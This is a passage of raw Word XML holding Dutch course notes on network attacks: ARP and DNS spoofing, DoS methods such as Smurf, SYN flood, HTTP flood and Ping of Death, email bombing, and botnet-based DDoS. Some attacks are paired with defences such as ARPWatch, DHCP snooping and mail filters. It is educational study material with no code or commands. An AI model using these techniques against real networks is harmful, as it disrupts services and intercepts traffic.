        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>MAC-adres versturen naar de aanvrager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B94D7B8" w14:textId="7D87C96B" w:rsidR="00912798" w:rsidRDefault="00912798" w:rsidP="00912798">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>= Unicast</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5EEBC5" w14:textId="77777777" w:rsidR="00912798" w:rsidRDefault="00912798" w:rsidP="00912798"/>
    <w:p w14:paraId="157BC8AB" w14:textId="48CE0689" w:rsidR="00912798" w:rsidRDefault="00912798" w:rsidP="00912798">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DD9B60" w14:textId="77777777" w:rsidR="00912798" w:rsidRDefault="00912798" w:rsidP="00912798"/>
    <w:p w14:paraId="2A9E710B" w14:textId="31090AFC" w:rsidR="00912798" w:rsidRDefault="00912798" w:rsidP="00912798">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Hacker stuurt ARP Response naar target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1744449D" w14:textId="2130B72F" w:rsidR="00912798" w:rsidRDefault="00912798" w:rsidP="00912798">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Response wordt in ARP Cache geplaatst</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F7381E" w14:textId="71356CDD" w:rsidR="00912798" w:rsidRDefault="00912798" w:rsidP="00912798">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Target stuurt bericht sturen naar trusted IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A3A140" w14:textId="77777777" w:rsidR="00A70816" w:rsidRDefault="00912798" w:rsidP="00DB278F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Zal aankomen bij de hacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5B49C5" w14:textId="510D3CD1" w:rsidR="00A70816" w:rsidRDefault="00A70816" w:rsidP="00A70816">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Default Gateway is het meest gebruikte target!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E2FCF1" w14:textId="77777777" w:rsidR="00D53E7A" w:rsidRDefault="00D53E7A" w:rsidP="00D53E7A"/>
    <w:p w14:paraId="02CF2BCD" w14:textId="741CF097" w:rsidR="00D53E7A" w:rsidRDefault="00D53E7A" w:rsidP="00D53E7A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>De hacker moet wel regelmatig de ARP Responses blijven sturen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64997825" w14:textId="1546B989" w:rsidR="00D53E7A" w:rsidRDefault="00D53E7A" w:rsidP="00D53E7A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>De ARP Cache wordt namelijk regelmatig vernieuwd.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D74ACA" w14:textId="77777777" w:rsidR="00D53E7A" w:rsidRDefault="00D53E7A" w:rsidP="00D53E7A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Oplossingen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554866CE" w14:textId="690A6875" w:rsidR="00D53E7A" w:rsidRDefault="00D53E7A" w:rsidP="00D53E7A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Statische links</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DE6A6D" w14:textId="77777777" w:rsidR="00D53E7A" w:rsidRDefault="00D53E7A" w:rsidP="00D53E7A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>ARP Watch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2CC18E" w14:textId="6CA0938E" w:rsidR="00D53E7A" w:rsidRDefault="00D53E7A" w:rsidP="00D53E7A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Dit houdt wijzigingen qua IP/Ethernet mapping in de gaten</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5644B8" w14:textId="2E385D7B" w:rsidR="00D53E7A" w:rsidRDefault="00D53E7A" w:rsidP="00D53E7A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>DHCP Snooping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFDD975" w14:textId="12355337" w:rsidR="003022AD" w:rsidRDefault="00D53E7A" w:rsidP="003022AD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Switches gebruiken DHCP data om te controleren of de mapping klopt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C61DA1" w14:textId="6151210C" w:rsidR="003022AD" w:rsidRDefault="008D506B" w:rsidP="008D506B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>DNS Spoofing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006DB93B" w14:textId="77777777" w:rsidR="008D506B" w:rsidRDefault="008D506B" w:rsidP="008D506B"/>
    <w:p w14:paraId="0C67C72E" w14:textId="7373621A" w:rsidR="008D506B" w:rsidRDefault="008D506B" w:rsidP="008D506B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>= Wijzigen van de DNS-tabellen die URLs aan IP-adressen linkt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB82BC1" w14:textId="4BC7EDE1" w:rsidR="008D506B" w:rsidRDefault="008D506B" w:rsidP="008D506B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Hacker moet forward lookup zone en reverse lookup zone wijzigen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6614ECA9" w14:textId="51CD9E34" w:rsidR="008D506B" w:rsidRDefault="008D506B" w:rsidP="008D506B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Anders zou je kunnen checken of de mapping nog klopt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFDAC73" w14:textId="583B1658" w:rsidR="008D506B" w:rsidRDefault="008D506B" w:rsidP="008D506B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Eenmaal succesvol verspreidt dit zich aangezien DNS-servers hun tabellen uitwisselen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123B6A5E" w14:textId="77777777" w:rsidR="00E1709A" w:rsidRDefault="00E1709A" w:rsidP="00E1709A"/>
    <w:p w14:paraId="693EEADD" w14:textId="7BA504CD" w:rsidR="00E1709A" w:rsidRDefault="00E1709A" w:rsidP="00E1709A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:br w:type="column"/>
      </w:r>
      <w:bookmarkStart w:id="17" w:name="_Toc453378506"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Denial Of Service</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="01FE8235" w14:textId="77777777" w:rsidR="00C80F7E" w:rsidRDefault="00C80F7E" w:rsidP="00C80F7E"/>
    <w:p w14:paraId="1BD5CA5A" w14:textId="73C0A0C8" w:rsidR="00C80F7E" w:rsidRPr="00C80F7E" w:rsidRDefault="00C80F7E" w:rsidP="00C80F7E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>DOS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B1A8F1" w14:textId="77777777" w:rsidR="00C80F7E" w:rsidRDefault="00C80F7E" w:rsidP="00C80F7E"/>
    <w:p w14:paraId="7CC38727" w14:textId="6D573C10" w:rsidR="00BF216D" w:rsidRDefault="00BF216D" w:rsidP="00C80F7E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>= Aanval die ervoor zorgt dat een bepaalde service niet meer kan functioneren</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7424D7E7" w14:textId="2BC8A916" w:rsidR="00BF216D" w:rsidRDefault="00BF216D" w:rsidP="00BF216D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Komen veel voor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5979AC02" w14:textId="6F7E3A35" w:rsidR="00BF216D" w:rsidRDefault="00BF216D" w:rsidP="00BF216D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Niet altijd het gevolg van een aanval</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588BF212" w14:textId="7B5789D0" w:rsidR="00BF216D" w:rsidRDefault="00772E74" w:rsidP="00BF216D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>9/11 -&gt; CNN-</w:t>
      </w:r>
      <w:r w:rsidR="00BF216D">
        <w:t>website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47388DE4" w14:textId="77777777" w:rsidR="00BF216D" w:rsidRDefault="00BF216D" w:rsidP="00BF216D"/>
    <w:p w14:paraId="3BEF6E6C" w14:textId="6B6C024B" w:rsidR="00BF216D" w:rsidRDefault="00BF216D" w:rsidP="00BF216D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Werking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A0E804" w14:textId="77777777" w:rsidR="00BF216D" w:rsidRDefault="00BF216D" w:rsidP="00BF216D"/>
    <w:p w14:paraId="1CF1A32B" w14:textId="7327949C" w:rsidR="00BF216D" w:rsidRDefault="002E3A5D" w:rsidP="002E3A5D">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="00BF216D">
        <w:t>rogrammeerfouten</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507D2C5E" w14:textId="77777777" w:rsidR="002E3A5D" w:rsidRPr="002E3A5D" w:rsidRDefault="002E3A5D" w:rsidP="002E3A5D"/>
    <w:p w14:paraId="487EB819" w14:textId="5C7A5775" w:rsidR="00BF216D" w:rsidRDefault="00BF216D" w:rsidP="00BF216D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Zoveel mogelijk bandbreedte in beslag nemen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445E9AEC" w14:textId="7C6A2047" w:rsidR="00BF216D" w:rsidRDefault="00BF216D" w:rsidP="00BF216D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>= actieve aanval</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB3EEEF" w14:textId="77777777" w:rsidR="00BF216D" w:rsidRDefault="00BF216D" w:rsidP="00BF216D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Smurf attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E209E3" w14:textId="77777777" w:rsidR="00BF216D" w:rsidRDefault="00BF216D" w:rsidP="00BF216D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Source IP spoofen van een request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A212BF" w14:textId="77777777" w:rsidR="00BF216D" w:rsidRDefault="00BF216D" w:rsidP="00BF216D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Broadcast versturen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B5F596" w14:textId="77777777" w:rsidR="00BF216D" w:rsidRDefault="00BF216D" w:rsidP="00BF216D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Iedereen wil antwoorden naar de Source IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72187100" w14:textId="18E3FD41" w:rsidR="00BF216D" w:rsidRDefault="00BF216D" w:rsidP="00BF216D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Bv via pingen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B99AF4" w14:textId="528541C6" w:rsidR="00BF216D" w:rsidRDefault="00BF216D" w:rsidP="00BF216D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Zoveel mogelijk bronnen verbruiken</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D777163" w14:textId="17C0E802" w:rsidR="00BF216D" w:rsidRDefault="00BF216D" w:rsidP="00BF216D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>SYN-aanval</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A45EDCE" w14:textId="39350EAF" w:rsidR="00BF216D" w:rsidRDefault="00BF216D" w:rsidP="00BF216D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Veel half-open verbindingen aanmaken met server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390CC02B" w14:textId="4ACE73D2" w:rsidR="00BF216D" w:rsidRDefault="00BF216D" w:rsidP="00BF216D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Misbruik van Three Way Handshake</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438119FA" w14:textId="12068386" w:rsidR="00BF216D" w:rsidRDefault="00BF216D" w:rsidP="00BF216D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>HTTP-aanval</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B309664" w14:textId="583E714D" w:rsidR="00BF216D" w:rsidRDefault="00BF216D" w:rsidP="00BF216D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Tegelijkertijd HTTP-verbindingen maken met webserver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CC5750" w14:textId="4519371F" w:rsidR="00BF216D" w:rsidRDefault="00BF216D" w:rsidP="00BF216D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Server wordt trager en valt uit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8D7D9F" w14:textId="1A1FF0FB" w:rsidR="00BF216D" w:rsidRPr="00700ADF" w:rsidRDefault="00BF216D" w:rsidP="00BF216D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700ADF">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Aanvragen laten verwerken (queries)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73646B90" w14:textId="78F286D6" w:rsidR="00BF216D" w:rsidRPr="00700ADF" w:rsidRDefault="00BF216D" w:rsidP="00BF216D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700ADF">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Complexe berekeningen laten doen (sorting)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566C865A" w14:textId="5400C641" w:rsidR="00BF216D" w:rsidRPr="00700ADF" w:rsidRDefault="00BF216D" w:rsidP="00BF216D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700ADF">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Kan ook PHP forms -&gt; gegevens opslaan!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7A1505" w14:textId="6EC2DB29" w:rsidR="00BF216D" w:rsidRDefault="00BF216D" w:rsidP="00BF216D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Programma’s/Systemen laten crashen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7EDA69" w14:textId="2A8117DD" w:rsidR="00BF216D" w:rsidRDefault="00700ADF" w:rsidP="00BF216D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700ADF">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Ping of Death</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357D4F01" w14:textId="6861B0E1" w:rsidR="00C85941" w:rsidRDefault="00C85941" w:rsidP="00C85941">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Ping = 64 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2F6C7C" w14:textId="4A0B675B" w:rsidR="00C85941" w:rsidRDefault="00C85941" w:rsidP="00C85941">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Een te grote ping fragmenteren</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CB8DCB" w14:textId="3288FA42" w:rsidR="00C85941" w:rsidRDefault="00C85941" w:rsidP="00C85941">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Destination doet reassembling -&gt; crash!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B21F7DD" w14:textId="3A47921A" w:rsidR="00DB278F" w:rsidRDefault="002E3A5D" w:rsidP="002E3A5D">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Emailbom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1BEA30" w14:textId="77777777" w:rsidR="002E3A5D" w:rsidRDefault="002E3A5D" w:rsidP="002E3A5D"/>
    <w:p w14:paraId="62F41DAF" w14:textId="1B3C9001" w:rsidR="002E3A5D" w:rsidRDefault="002E3A5D" w:rsidP="002E3A5D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Emailinbox flooden</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3901F5B9" w14:textId="5FCB5033" w:rsidR="002E3A5D" w:rsidRDefault="002E3A5D" w:rsidP="002E3A5D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>= HDD die vol geraakt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6D2903" w14:textId="653CA8DD" w:rsidR="002E3A5D" w:rsidRDefault="002E3A5D" w:rsidP="002E3A5D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">= Geen nieuwe berichten kunnen </w:t>
      </w:r>
      <w:r w:rsidR="00CB64A4">
        <w:t>er</w:t>
      </w:r>
      <w:r>
        <w:t>naar verstuurd worden</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4E33B0" w14:textId="11020598" w:rsidR="002E3A5D" w:rsidRDefault="002E3A5D" w:rsidP="002E3A5D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>= Gegevensverlies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1264823F" w14:textId="5FAC7895" w:rsidR="00C80F7E" w:rsidRDefault="00C80F7E" w:rsidP="00C80F7E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Oplossingen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E566FB" w14:textId="769ADE51" w:rsidR="00C80F7E" w:rsidRDefault="00C80F7E" w:rsidP="00C80F7E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Mailfilters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4FC2BC" w14:textId="77777777" w:rsidR="00C80F7E" w:rsidRDefault="00C80F7E" w:rsidP="00C80F7E"/>
    <w:p w14:paraId="1F06BDAB" w14:textId="60A701D7" w:rsidR="00C80F7E" w:rsidRDefault="00C80F7E" w:rsidP="00C80F7E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>DD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4242DA" w14:paraId="66A8E49E" w14:textId="77777777" w:rsidTr="004242DA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5381" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="354B2F08" w14:textId="77777777" w:rsidR="004242DA" w:rsidRDefault="004242DA" w:rsidP="004242DA">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Netwerkverkeer afkomstig van veel systemen tegelijkertijd</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20581376" w14:textId="77777777" w:rsidR="004242DA" w:rsidRDefault="004242DA" w:rsidP="004242DA">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Werkt op basis van Master-Slave</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6DEF4944" w14:textId="77777777" w:rsidR="004242DA" w:rsidRDefault="004242DA" w:rsidP="004242DA">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="1"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Master is het eerste systeem waarmee de aanval opzet</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FDAA6C6" w14:textId="77777777" w:rsidR="004242DA" w:rsidRDefault="004242DA" w:rsidP="004242DA">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="1"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Slavez zijn externe system die de aanval uitvoeren</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C60F461" w14:textId="47B218E3" w:rsidR="004242DA" w:rsidRDefault="004242DA" w:rsidP="004242DA">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>= Bot-net = Zombie-net</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5382" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E8BDCF8" w14:textId="6D594C5C" w:rsidR="004242DA" w:rsidRDefault="004242DA" w:rsidP="004242DA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="004242DA">
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15D34C27" wp14:editId="42E2747D">
